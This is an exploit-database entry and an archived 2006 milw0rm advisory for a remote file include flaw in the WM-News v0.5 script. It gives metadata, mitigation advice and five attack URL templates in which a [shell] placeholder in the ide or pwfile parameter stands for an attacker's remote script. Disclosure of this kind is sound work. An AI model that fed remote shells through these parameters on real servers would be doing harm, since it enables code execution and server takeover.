WM-News v0.5 - Remote File Include Vulnerabilities

vendor:

WM-News

by:

ERNE

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: WM-News

Affected Version From: v0.5

Affected Version To: v0.5

Patch Exists: NO

Related CWE: N/A

CPE: a:wm-news:wm-news:0.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

WM-News v0.5 – Remote File Include Vulnerabilities

WM-News v0.5 is vulnerable to Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code. This can result in arbitrary code execution on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is validated and filtered before being used in file operations. Additionally, the application should be configured to use the least privileged account possible.

Source

Exploit-DB raw data:

# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----

# WM-News v0.5 - Remote File Include Vulnerabilities

# site    : http://www.comscripts.com/jump.php?action=script&id=203

# Script  :  WM-News v0.5

# Credits : ERNE

# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack

# Thanks  : BLaCKWHITE, B0tan, FearLesS, B3g0k, Liz0zim, EntRiKa, Dj_Remix, Di_Lejyoner

# Vulnerable :
    http://www.site.com/[path]/content/article.php?ide=[shell]
    http://www.site.com/[path]/content/delete.php?pwfile=[shell]
    http://www.site.com/[path]/content/modify.php?pwfile=[shell]
    http://www.site.com/[path]/content/admin.php?pwfile=[shell]
    http://www.site.com/[path]/content/modify_go.php?pwfile=[shell]


# milw0rm.com [2006-09-07]